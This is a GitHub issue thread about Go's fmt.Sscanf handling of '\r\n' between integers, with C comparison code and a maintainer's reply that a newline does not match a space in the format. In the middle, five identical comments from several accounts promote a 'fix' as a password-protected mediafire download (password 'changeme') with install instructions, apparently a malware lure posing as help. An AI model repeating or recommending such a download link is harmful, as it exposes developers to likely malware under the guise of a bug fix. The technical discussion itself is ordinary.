### ISSUE TITLE
fmt: Scanf / Sscanf does not properly treat carriage return symbol, behaves different with C function

### ISSUE THREAD

**Issue by RodionGork** [golang/go#69103]
### Go version

go1.23

### Output of `go env` in your module/workspace:

```shell
GO...=n/a
```

### What did you do?

Here is an example in playground https://go.dev/play/p/z7Rd0o0PiJH

We simply try reading with `fmt.Sscanf` (from the prepared string, but it is the same with `fmt.Scanf` reading from stdin - just more difficult to demonstrate) - there are two integer values, separated with windows-style newline (`\r\n`).

```go
	var x, y int
	input := "5\r\n8\r\n"
	fmt.Sscanf(input, "%d %d", &x, &y)
	fmt.Println(x, y)
```

### What did you see happen?

It prints `5 0`

### What did you expect to see?

It should print `5 8`

C code for comparing behavior:

```c
#include <stdio.h>

int main() {
  char s[] = "5\r\n8\r\n";
  int x, y;
  sscanf(s, "%d %d", &x, &y);
  printf("%d %d\n", x, y);
  return 0;
}
```
Also this is not in concordance with package description here https://pkg.go.dev/fmt

    In all the scanning functions, a carriage return followed immediately by a newline
    is treated as a plain newline (\r\n means the same as \n).

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by seankhliao** [comment]
A newline is not a space, even without \r your line won't match. 

Unlike many projects, the Go project does not use GitHub Issues for general discussion or asking questions. GitHub Issues are used for tracking bugs and proposals only.

For questions please refer to https://github.com/golang/go/wiki/Questions
